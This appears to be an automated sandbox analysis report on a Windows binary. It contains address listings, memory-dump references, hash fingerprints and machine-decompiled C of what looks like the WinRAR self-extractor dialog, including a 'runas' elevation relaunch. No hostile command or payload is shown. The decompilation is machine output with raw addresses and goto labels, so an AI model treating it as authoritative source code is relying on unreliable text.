                                                                                                                                                    0x01218b06
                                                                                                                                                    0x01218b0e
                                                                                                                                                    0x01218b0f
                                                                                                                                                    0x01218b12
                                                                                                                                                    0x01218b1a
                                                                                                                                                    0x01218b1b
                                                                                                                                                    0x01218b1e
                                                                                                                                                    0x01218b20
                                                                                                                                                    0x01218b26
                                                                                                                                                    0x01218b2c
                                                                                                                                                    0x01218b2e
                                                                                                                                                    0x01218b34
                                                                                                                                                    0x01218b3b
                                                                                                                                                    0x01218b3e
                                                                                                                                                    0x01218b3e
                                                                                                                                                    0x01218b2c
                                                                                                                                                    0x01218b1e
                                                                                                                                                    0x01218b12
                                                                                                                                                    0x01218b06
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01218af9
                                                                                                                                                    0x01218a5d
                                                                                                                                                    0x01218a60
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01218a66
                                                                                                                                                    0x01218a69
                                                                                                                                                    0x01218a6c
                                                                                                                                                    0x01218a6e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01218a74
                                                                                                                                                    0x01218a77
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01218a7d
                                                                                                                                                    0x01218a80
                                                                                                                                                    0x01218a87
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01218a8f
                                                                                                                                                    0x01218a99
                                                                                                                                                    0x01218a9e
                                                                                                                                                    0x01218aa0
                                                                                                                                                    0x01218ad7
                                                                                                                                                    0x01218ad7
                                                                                                                                                    0x01218adb
                                                                                                                                                    0x01218b65
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01218b65
                                                                                                                                                    0x01218ae1
                                                                                                                                                    0x01218ae3
                                                                                                                                                    0x01218ae5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01218ae5
                                                                                                                                                    0x01218aa2
                                                                                                                                                    0x01218aa6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01218aa8
                                                                                                                                                    0x01218ab0
                                                                                                                                                    0x01218ab1
                                                                                                                                                    0x01218ab8
                                                                                                                                                    0x01218ad2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01218ad2
                                                                                                                                                    0x01218998
                                                                                                                                                    0x0121899f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012189a7
                                                                                                                                                    0x012189b2
                                                                                                                                                    0x012189b7
                                                                                                                                                    0x012189ba
                                                                                                                                                    0x012189bc
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012189be
                                                                                                                                                    0x012189c5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012189c7
                                                                                                                                                    0x012189ce
                                                                                                                                                    0x012189d8
                                                                                                                                                    0x012189d9
                                                                                                                                                    0x01218a10
                                                                                                                                                    0x01218a12
                                                                                                                                                    0x01218a1e
                                                                                                                                                    0x01218a23
                                                                                                                                                    0x01218a25
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01218a25
                                                                                                                                                    0x012189db
                                                                                                                                                    0x012189dd
                                                                                                                                                    0x012189eb
                                                                                                                                                    0x012189f0
                                                                                                                                                    0x012189f4
                                                                                                                                                    0x012189fa
                                                                                                                                                    0x012189fa
                                                                                                                                                    0x0121890b
                                                                                                                                                    0x012188f0
                                                                                                                                                    0x012188f7
                                                                                                                                                    0x012188fc
                                                                                                                                                    0x01218903
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01218903
                                                                                                                                                    0x01218895
                                                                                                                                                    0x0121889b
                                                                                                                                                    0x012188a0
                                                                                                                                                    0x012188a2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012188a4
                                                                                                                                                    0x012188ab
                                                                                                                                                    0x012188bd
                                                                                                                                                    0x012188bf
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012188bf
                                                                                                                                                    0x012188ae
                                                                                                                                                    0x012188b4
                                                                                                                                                    0x012188b9
                                                                                                                                                    0x012188bb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012188bb
                                                                                                                                                    0x01218864
                                                                                                                                                    0x01218867
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01218867
                                                                                                                                                    0x01218856
                                                                                                                                                    0x0121885d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121885d
                                                                                                                                                    0x01218826
                                                                                                                                                    0x0121882d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121882f
                                                                                                                                                    0x01218833
                                                                                                                                                    0x01218839
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01218839
                                                                                                                                                    0x012187d7
                                                                                                                                                    0x012187da
                                                                                                                                                    0x012187dc
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012187dc
                                                                                                                                                    0x012187ae
                                                                                                                                                    0x012187b4
                                                                                                                                                    0x012187b7
                                                                                                                                                    0x012187ba
                                                                                                                                                    0x012187bc
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012187c2
                                                                                                                                                    0x012187c2
                                                                                                                                                    0x012187c2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012187c2
                                                                                                                                                    0x012187bc
                                                                                                                                                    0x01218677
                                                                                                                                                    0x0121867d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121867f
                                                                                                                                                    0x01218686
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01218686
                                                                                                                                                    0x01218650
                                                                                                                                                    0x0121865a
                                                                                                                                                    0x0121865a
                                                                                                                                                    0x01218660
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01218660
                                                                                                                                                    0x01218652
                                                                                                                                                    0x01218658
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01218658
                                                                                                                                                    0x01218632
                                                                                                                                                    0x0121863c
                                                                                                                                                    0x0121863c
                                                                                                                                                    0x01218642
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01218642
                                                                                                                                                    0x01218634
                                                                                                                                                    0x0121863a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121863a
                                                                                                                                                    0x01218591
                                                                                                                                                    0x01218594
                                                                                                                                                    0x012185b3
                                                                                                                                                    0x012185b3
                                                                                                                                                    0x012185b6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012185bc
                                                                                                                                                    0x012185c3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012185ce
                                                                                                                                                    0x012185cf
                                                                                                                                                    0x012185d3
                                                                                                                                                    0x012185d4
                                                                                                                                                    0x012185d5
                                                                                                                                                    0x012185da
                                                                                                                                                    0x012185dc
                                                                                                                                                    0x012185f1
                                                                                                                                                    0x01218605
                                                                                                                                                    0x0121860d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012185de
                                                                                                                                                    0x012185e5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012185e5
                                                                                                                                                    0x012185dc
                                                                                                                                                    0x01218596
                                                                                                                                                    0x0121859d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012185a3
                                                                                                                                                    0x012185ae
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012185ae
                                                                                                                                                    0x0121859d
                                                                                                                                                    0x0121855a
                                                                                                                                                    0x01218578
                                                                                                                                                    0x01218578
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01218578
                                                                                                                                                    0x0121855c
                                                                                                                                                    0x0121855d
                                                                                                                                                    0x01218561
                                                                                                                                                    0x01218562
                                                                                                                                                    0x0121856a
                                                                                                                                                    0x0121857f
                                                                                                                                                    0x0121857f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121856c
                                                                                                                                                    0x01218573
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01218573

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: H_prolog_memcmp
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3004599000-0
                                                                                                                                                    • Opcode ID: 03c16fa57b66d6562d0c6e941f9d5aab2ead8c473370867c9ed929e68678172f
                                                                                                                                                    • Instruction ID: 21cbca50a74d25dda357a8cb349ca2732b64c74dac4cf266a0cdd4119f51e366
                                                                                                                                                    • Opcode Fuzzy Hash: 03c16fa57b66d6562d0c6e941f9d5aab2ead8c473370867c9ed929e68678172f
                                                                                                                                                    • Instruction Fuzzy Hash: 1E821A71924286AEDF25CF68C8D0BFABBF9BF25300F0841B9DA499B14AD7315684C760
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122EEB3, Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0122EEB3() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E0122EEC0); // executed
				return _t1;
			}




                                                                                                                                                    0x0122eeb8
                                                                                                                                                    0x0122eebe

                                                                                                                                                    APIs
                                                                                                                                                    • SetUnhandledExceptionFilter.KERNELBASE(Function_0001EEC0,0122E905), ref: 0122EEB8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                    • Opcode ID: c6d9b407dd122eccf16c624da316119d005518a5dc000b0d83f5cdf576fe437b
                                                                                                                                                    • Instruction ID: f67b175e858113e2e161af2cb384502afed28622a21eb0e8a86884b64b9da9b2
                                                                                                                                                    • Opcode Fuzzy Hash: c6d9b407dd122eccf16c624da316119d005518a5dc000b0d83f5cdf576fe437b
                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122AE20, Relevance: 100.5, APIs: 47, Strings: 10, Instructions: 724COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 78%
                                                                                                                                                    			E0122AE20(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
				void* __ebx;
				void* __esi;
				long _t105;
				long _t106;
				struct HWND__* _t107;
				struct HWND__* _t111;
				void* _t114;
				void* _t115;
				int _t116;
				void* _t133;
				void* _t137;
				signed int _t149;
				void* _t166;
				int _t169;
				void* _t182;
				void* _t189;
				void* _t190;
				long _t195;
				void* _t220;
				signed int _t230;
				void* _t231;
				int _t246;
				long _t247;
				long _t248;
				long _t249;
				signed int _t256;
				WCHAR* _t257;
				int _t261;
				int _t263;
				void* _t268;
				void* _t272;
				signed short _t277;
				int _t279;
				WCHAR* _t288;
				WCHAR* _t290;
				intOrPtr _t292;
				void* _t301;
				int _t302;
				struct HWND__* _t304;
				intOrPtr _t307;
				void* _t308;
				struct HWND__* _t309;
				void* _t311;
				struct HWND__* _t313;
				long _t314;
				struct HWND__* _t315;
				void* _t316;
				void* _t317;
				void* _t319;
				void* _t320;
				void* _t322;

				_t301 = __edx;
				_t287 = __ecx;
				E0122E0E4(E01241E7E, _t320);
				E0122E1C0();
				_t277 =  *(_t320 + 0x10);
				_t307 =  *((intOrPtr*)(_t320 + 0xc));
				_t304 =  *(_t320 + 8);
				if(E0121130B(_t301, _t304, _t307, _t277,  *((intOrPtr*)(_t320 + 0x14)), L"STARTDLG", 0, 0) == 0) {
					_t308 = _t307 - 0x110;
					__eflags = _t308;
					if(__eflags == 0) {
						_push(_t304);
						E0122CBAE(_t287, _t301, __eflags, __fp0);
						_t105 =  *0x125b574;
						_t279 = 1;
						 *0x1257448 = _t304;
						 *0x1257438 = _t304;
						__eflags = _t105;
						if(_t105 != 0) {
							SendMessageW(_t304, 0x80, 1, _t105); // executed
						}
						_t106 =  *0x1265b74;
						__eflags = _t106;
						if(_t106 != 0) {
							SendDlgItemMessageW(_t304, 0x6c, 0x172, 0, _t106); // executed
						}
						_t107 = GetDlgItem(_t304, 0x68);
						 *(_t320 - 0x14) = _t107;
						SendMessageW(_t107, 0x435, 0, 0x400000);
						E01229D58(_t320 - 0x1174, 0x800);
						_t111 = GetDlgItem(_t304, 0x66);
						__eflags =  *0x1259472;
						_t309 = _t111;
						 *(_t320 - 0x18) = _t309;
						_t288 = 0x1259472;
						if( *0x1259472 == 0) {
							_t288 = _t320 - 0x1174;
						}
						SetWindowTextW(_t309, _t288);
						E0122A245(_t309); // executed
						_push(0x1257454);
						_push(0x1257450);
						_push(0x126cc88);
						_push(_t304);
						 *0x1257446 = 0; // executed
						_t114 = E0122A712(_t288, _t301, __eflags); // executed
						__eflags = _t114;
						if(_t114 == 0) {
							 *0x1257441 = _t279;
						}
						__eflags =  *0x1257454;
						if( *0x1257454 > 0) {
							_push(7);
							_push( *0x1257450);
							_push(_t304);
							E0122BD35(_t301);
						}
						__eflags =  *0x126dc90;
						if( *0x126dc90 == 0) {
							SetDlgItemTextW(_t304, 0x6b, E0121DD11(_t288, 0xbf));
							SetDlgItemTextW(_t304, _t279, E0121DD11(_t288, 0xbe));
						}
						__eflags =  *0x1257454;
						if( *0x1257454 <= 0) {
							L103:
							__eflags =  *0x1257446;
							if( *0x1257446 != 0) {
								L114:
								__eflags =  *0x125946c - 2;
								if( *0x125946c == 2) {
									EnableWindow(_t309, 0);
								}
								__eflags =  *0x1258468;
								if( *0x1258468 != 0) {
									E012112C8(_t304, 0x67, 0);
									E012112C8(_t304, 0x66, 0);
								}
								_t115 =  *0x125946c;
								__eflags = _t115;
								if(_t115 != 0) {
									__eflags =  *0x1257447;
									if( *0x1257447 == 0) {
										_push(0);
										_push(_t279);
										_push(0x111);
										_push(_t304);
										__eflags = _t115 - _t279;
										if(_t115 != _t279) {
											 *0x12710b8();
										} else {
											SendMessageW(); // executed
										}
									}
								}
								__eflags =  *0x1257441;
								if( *0x1257441 != 0) {
									SetDlgItemTextW(_t304, _t279, E0121DD11(_t288, 0x90));
								}
								goto L125;
							}
							__eflags =  *0x126cc7c;
							if( *0x126cc7c != 0) {
								goto L114;
							}
							__eflags =  *0x125946c;
							if( *0x125946c != 0) {
								goto L114;
							}
							__eflags = 0;
							_t311 = 0xaa;
							 *((short*)(_t320 - 0x9698)) = 0;
							do {
								__eflags = _t311 - 0xaa;
								if(_t311 != 0xaa) {
									L109:
									__eflags = _t311 - 0xab;
									if(__eflags != 0) {
										L111:
										E0121FD6E(__eflags, _t320 - 0x9698, " ", 0x2000);
										E0121FD6E(__eflags, _t320 - 0x9698, E0121DD11(_t288, _t311), 0x2000);
										goto L112;
									}
									__eflags =  *0x126dc90;
									if(__eflags != 0) {
										goto L112;
									}
									goto L111;
								}
								__eflags =  *0x126dc90;
								if( *0x126dc90 == 0) {
									goto L112;
								}
								goto L109;
								L112:
								_t311 = _t311 + 1;
								__eflags = _t311 - 0xb0;
							} while (__eflags <= 0);
							_t288 =  *0x1257458; // 0x0
							E012295B5(_t288, __eflags,  *0x124fed4,  *(_t320 - 0x14), _t320 - 0x9698, 0, 0);
							_t309 =  *(_t320 - 0x18);
							goto L114;
						} else {
							_push(0);
							_push( *0x1257450);
							_push(_t304); // executed
							E0122BD35(_t301); // executed
							_t133 =  *0x126cc7c;
							__eflags = _t133;
							if(_t133 != 0) {
								__eflags =  *0x125946c;
								if(__eflags == 0) {
									_t290 =  *0x1257458; // 0x0
									E012295B5(_t290, __eflags,  *0x124fed4,  *(_t320 - 0x14), _t133, 0, 0);
									L0123340E( *0x126cc7c);
									_pop(_t288);
								}
							}
							__eflags =  *0x125946c - _t279;
							if( *0x125946c == _t279) {
								L102:
								_push(_t279);
								_push( *0x1257450);
								_push(_t304);
								E0122BD35(_t301);
								goto L103;
							} else {
								 *0x12710bc(_t304);
								__eflags =  *0x125946c - _t279;
								if( *0x125946c == _t279) {
									goto L102;
								}
								__eflags =  *0x1259471;
								if( *0x1259471 != 0) {
									goto L102;
								}
								_push(3);
								_push( *0x1257450);
								_push(_t304);
								E0122BD35(_t301);
								__eflags =  *0x126dc88;
								if( *0x126dc88 == 0) {
									goto L102;
								}
								_t137 = DialogBoxParamW( *0x124fed4, L"LICENSEDLG", 0, E0122AC20, 0);
								__eflags = _t137;
								if(_t137 == 0) {
									L25:
									 *0x1257447 = _t279;
									L26:
									_push(_t279);
									L13:
									EndDialog(_t304, ??); // executed
									L125:
									_t116 = _t279;
									L126:
									 *[fs:0x0] =  *((intOrPtr*)(_t320 - 0xc));
									return _t116;
								}
								goto L102;
							}
						}
					}
					__eflags = _t308 != 1;
					if(_t308 != 1) {
						L7:
						_t116 = 0;
						goto L126;
					}
					_t149 = (_t277 & 0x0000ffff) - 1;
					__eflags = _t149;
					if(_t149 == 0) {
						__eflags =  *0x1257440;
						if( *0x1257440 != 0) {
							L23:
							GetDlgItemTextW(_t304, 0x66, _t320 - 0x2174, 0x800);
							__eflags =  *0x1257440;
							if( *0x1257440 == 0) {
								__eflags =  *0x1257441;
								if( *0x1257441 == 0) {
									_t313 = GetDlgItem(_t304, 0x68);
									__eflags =  *0x125743c; // 0x0
									if(__eflags == 0) {
										SendMessageW(_t313, 0xb1, 0, 0xffffffff);
										SendMessageW(_t313, 0xc2, 0, 0x12425b4);
									}
									SetFocus(_t313);
									__eflags =  *0x1258468;
									if( *0x1258468 == 0) {
										_t314 = 0x800;
										E0121FD96(_t320 - 0x1174, _t320 - 0x2174, 0x800);
										E0122C961(_t287, _t320 - 0x1174, 0x800);
										E01213FD6(_t320 - 0x4298, 0x880, E0121DD11(_t287, 0xb9), _t320 - 0x1174);
										_t322 = _t322 + 0x10;
										_push(_t320 - 0x4298);
										_push(0);
										E0122C9E2();
									} else {
										_push(E0121DD11(_t287, 0xba));
										_push(0);
										E0122C9E2();
										_t314 = 0x800;
									}
									__eflags =  *0x1259471;
									if( *0x1259471 == 0) {
										E0122D06F(_t320 - 0x2174);
									}
									_push(0);
									_push(_t320 - 0x2174);
									 *(_t320 - 0xe) = 0;
									_t166 = E01219F8F(0, _t320);
									_t279 = 1;
									__eflags = _t166;
									if(_t166 != 0) {
										L40:
										_t302 = E0122A2A0(_t320 - 0x2174);
										 *(_t320 - 0xd) = _t302;
										__eflags = _t302;
										if(_t302 != 0) {
											L43:
											_t169 =  *(_t320 - 0xe);
											L44:
											_t287 =  *0x1259471;
											__eflags = _t287;
											if(_t287 != 0) {
												L50:
												__eflags =  *(_t320 - 0xd);
												if( *(_t320 - 0xd) != 0) {
													 *0x125744c = _t279;
													E012112E6(_t304, 0x67, 0);
													E012112E6(_t304, 0x66, 0);
													SetDlgItemTextW(_t304, _t279, E0121DD11(_t287, 0xe6)); // executed
													E012112E6(_t304, 0x69, _t279);
													SetDlgItemTextW(_t304, 0x65, 0x12425b4); // executed
													_t315 = GetDlgItem(_t304, 0x65);
													__eflags = _t315;
													if(_t315 != 0) {
														_t195 = GetWindowLongW(_t315, 0xfffffff0) | 0x00000080;
														__eflags = _t195;
														SetWindowLongW(_t315, 0xfffffff0, _t195);
													}
													_push(5);
													_push( *0x1257450);
													_push(_t304);
													E0122BD35(_t302);
													_push(2);
													_push( *0x1257450);
													_push(_t304);
													E0122BD35(_t302);
													_push(0x126cc88);
													_push(_t304);
													 *0x126fcac = _t279; // executed
													E0122CF72(_t287, __eflags); // executed
													_push(6);
													_push( *0x1257450);
													 *0x126fcac = 0;
													_push(_t304);
													E0122BD35(_t302);
													__eflags =  *0x1257447;
													if( *0x1257447 == 0) {
														__eflags =  *0x125743c;
														if( *0x125743c == 0) {
															__eflags =  *0x126dc9c;
															if( *0x126dc9c == 0) {
																_push(4);
																_push( *0x1257450);
																_push(_t304); // executed
																E0122BD35(_t302); // executed
															}
														}
													}
													E012112C8(_t304, _t279, _t279);
													 *0x125744c =  *0x125744c & 0x00000000;
													__eflags =  *0x125744c;
													_t182 =  *0x1257447; // 0x1
													goto L75;
												}
												__eflags = _t287;
												_t169 = (_t169 & 0xffffff00 | _t287 != 0x00000000) - 0x00000001 &  *(_t320 - 0xe);
												__eflags = _t169;
												L52:
												__eflags = _t169;
												 *(_t320 - 0xd) = _t169 == 0;
												__eflags = _t169;
												if(_t169 == 0) {
													L66:
													__eflags =  *(_t320 - 0xd);
													if( *(_t320 - 0xd) != 0) {
														_push(E0121DD11(_t287, 0x9a));
														E01213FD6(_t320 - 0x5698, 0xa00, L"\"%s\"\n%s", _t320 - 0x2174);
														E01216F5B(0x124ff50, _t279);
														E01229EB3(_t304, _t320 - 0x5698, E0121DD11(0x124ff50, 0x96), 0x30);
														 *0x125743c =  *0x125743c + 1;
													}
													L12:
													_push(0);
													goto L13;
												}
												GetModuleFileNameW(0, _t320 - 0x1174, _t314);
												_t287 = 0x125b472;
												E0121EA7A(0x125b472, _t320 - 0x174, 0x80);
												_push(0x125a472);
												E01213FD6(_t320 - 0x11cb0, 0x430c, L"-el -s2 \"-d%s\" \"-sp%s\"", _t320 - 0x2174);
												_t322 = _t322 + 0x14;
												 *(_t320 - 0x58) = 0x3c;
												 *((intOrPtr*)(_t320 - 0x54)) = 0x40;
												 *((intOrPtr*)(_t320 - 0x48)) = _t320 - 0x1174;
												 *((intOrPtr*)(_t320 - 0x44)) = _t320 - 0x11cb0;
												 *(_t320 - 0x50) = _t304;
												 *((intOrPtr*)(_t320 - 0x4c)) = L"runas";
												 *(_t320 - 0x3c) = _t279;
												 *((intOrPtr*)(_t320 - 0x38)) = 0;
												 *((intOrPtr*)(_t320 - 0x40)) = 0x1257468;
												_t317 = CreateFileMappingW(0xffffffff, 0, 0x8000004, 0, 0x7104, L"winrarsfxmappingfile.tmp");
												 *(_t320 - 0x14) = _t317;
												__eflags = _t317;
												if(_t317 == 0) {
													 *(_t320 - 0x1c) =  *(_t320 - 0x14);
												} else {
													 *0x1265b78 = 0;
													_t231 = GetCommandLineW();
													__eflags = _t231;
													if(_t231 != 0) {
														E0121FD96(0x1265b7a, _t231, 0x2000);
													}
													E0122AA7E(_t287, 0x1269b7a, 7);
													E0122AA7E(_t287, 0x126ab7a, 2);
													E0122AA7E(_t287, 0x126bb7a, 0x10);
													 *0x126cc7b = _t279;
													_t287 = 0x126cb7a;
													E0121EBED(_t279, 0x126cb7a, _t320 - 0x174);
													 *(_t320 - 0x1c) = MapViewOfFile(_t317, 2, 0, 0, 0);
													E0122F300(_t238, 0x1265b78, 0x7104);
													_t322 = _t322 + 0xc;
												}
												_t220 = ShellExecuteExW(_t320 - 0x58);
												E0121EC38(_t320 - 0x174, 0x80);
												E0121EC38(_t320 - 0x11cb0, 0x430c);
												__eflags = _t220;
												if(_t220 == 0) {
													_t319 =  *(_t320 - 0x1c);
													 *(_t320 - 0xd) = _t279;
													goto L64;
												} else {
													 *0x12710a0( *(_t320 - 0x20), 0x2710);
													_t71 = _t320 - 0x18;
													 *_t71 =  *(_t320 - 0x18) & 0x00000000;
													__eflags =  *_t71;
													_t319 =  *(_t320 - 0x1c);
													while(1) {
														__eflags =  *_t319;
														if( *_t319 != 0) {
															break;
														}
														Sleep(0x64);
														_t230 =  *(_t320 - 0x18) + 1;
														 *(_t320 - 0x18) = _t230;
														__eflags = _t230 - 0x64;
														if(_t230 < 0x64) {
															continue;
														}
														break;
													}
													 *0x126dc9c =  *(_t320 - 0x20);
													L64:
													__eflags =  *(_t320 - 0x14);
													if( *(_t320 - 0x14) != 0) {
														UnmapViewOfFile(_t319);
														CloseHandle( *(_t320 - 0x14));
													}
													goto L66;
												}
											}
											__eflags = _t302;
											if(_t302 == 0) {
												goto L52;
											}
											E01213FD6(_t320 - 0x1174, _t314, L"__tmp_rar_sfx_access_check_%u", GetTickCount());
											_t322 = _t322 + 0x10;
											E012195B6(_t320 - 0x3198);
											 *(_t320 - 4) =  *(_t320 - 4) & 0x00000000;
											_push(0x11);
											_push(_t320 - 0x1174);
											_t246 = E012196BE(_t320 - 0x3198);
											 *(_t320 - 0xd) = _t246;
											__eflags = _t246;
											if(_t246 == 0) {
												_t247 = GetLastError();
												__eflags = _t247 - 5;
												if(_t247 == 5) {
													 *(_t320 - 0xe) = _t279;
												}
											}
											_t39 = _t320 - 4;
											 *_t39 =  *(_t320 - 4) | 0xffffffff;
											__eflags =  *_t39;
											_t169 = E012195E8(_t320 - 0x3198, _t314); // executed
											_t287 =  *0x1259471;
											goto L50;
										}
										_t248 = GetLastError();
										_t302 =  *(_t320 - 0xd);
										__eflags = _t248 - 5;
										if(_t248 != 5) {
											goto L43;
										}
										_t169 = _t279;
										 *(_t320 - 0xe) = _t169;
										goto L44;
									} else {
										_t249 = GetLastError();
										__eflags = _t249 - 5;
										if(_t249 == 5) {
											L39:
											 *(_t320 - 0xe) = _t279;
											goto L40;
										}
										__eflags = _t249 - 3;
										if(_t249 != 3) {
											goto L40;
										}
										goto L39;
									}
								} else {
									_t279 = 1;
									_t182 = 1;
									 *0x1257447 = 1;
									L75:
									__eflags =  *0x125743c;
									if( *0x125743c <= 0) {
										goto L26;
									}
									__eflags = _t182;
									if(_t182 != 0) {
										goto L26;
									}
									 *0x1257440 = _t279;
									SetDlgItemTextW(_t304, _t279, E0121DD11(_t287, 0x90));
									_t292 =  *0x124ff50; // 0x0
									__eflags = _t292 - 9;
									if(_t292 != 9) {
										__eflags = _t292 - 3;
										_t189 = ((0 | _t292 != 0x00000003) - 0x00000001 & 0x0000000a) + 0x97;
										__eflags = _t189;
										 *(_t320 - 0x14) = _t189;
										_t316 = _t189;
									} else {
										_t316 = 0xa0;
									}
									_t190 = E0121DD11(_t292, 0x96);
									E01229EB3(_t304, E0121DD11(_t292, _t316), _t190, 0x30);
									goto L125;
								}
							}
							_t279 = 1;
							__eflags =  *0x1257441;
							if( *0x1257441 == 0) {
								goto L26;
							}
							goto L25;
						}
						__eflags =  *0x126fcac;
						if( *0x126fcac == 0) {
							goto L23;
						} else {
							__eflags =  *0x126fcad;
							_t256 = _t149 & 0xffffff00 |  *0x126fcad == 0x00000000;
							__eflags = _t256;
							 *0x126fcad = _t256;
							_t257 = E0121DD11((0 | _t256 != 0x00000000) + 0xe6, (0 | _t256 != 0x00000000) + 0xe6);
							_t279 = 1;
							SetDlgItemTextW(_t304, 1, _t257);
							while(1) {
								__eflags =  *0x126fcad;
								if( *0x126fcad == 0) {
									goto L125;
								}
								__eflags =  *0x1257447;
								if( *0x1257447 != 0) {
									goto L125;
								}
								_t261 = GetMessageW(_t320 - 0x74, 0, 0, 0);
								__eflags = _t261;
								if(_t261 == 0) {
									goto L125;
								} else {
									_t263 = IsDialogMessageW(_t304, _t320 - 0x74);
									__eflags = _t263;
									if(_t263 == 0) {
										TranslateMessage(_t320 - 0x74);
										DispatchMessageW(_t320 - 0x74);
									}
									continue;
								}
							}
							goto L125;
						}
					}
					_t268 = _t149 - 1;
					__eflags = _t268;
					if(_t268 == 0) {
						_t279 = 1;
						__eflags =  *0x125744c;
						 *0x1257447 = 1;
						if( *0x125744c == 0) {
							goto L12;
						}
						__eflags =  *0x125743c;
						if( *0x125743c != 0) {
							goto L125;
						}
						goto L12;
					}
					__eflags = _t268 == 0x65;
					if(_t268 == 0x65) {
						_t272 = E01211241(_t304, E0121DD11(_t287, 0x64), _t320 - 0x1174);
						__eflags = _t272;
						if(_t272 != 0) {
							SetDlgItemTextW(_t304, 0x66, _t320 - 0x1174);
						}
						goto L1;
					}
					goto L7;
				}
				L1:
				_t116 = 1;
				goto L126;
			}






















































                                                                                                                                                    0x0122ae20
                                                                                                                                                    0x0122ae20
                                                                                                                                                    0x0122ae25
                                                                                                                                                    0x0122ae2f
                                                                                                                                                    0x0122ae35
                                                                                                                                                    0x0122ae39
                                                                                                                                                    0x0122ae3d
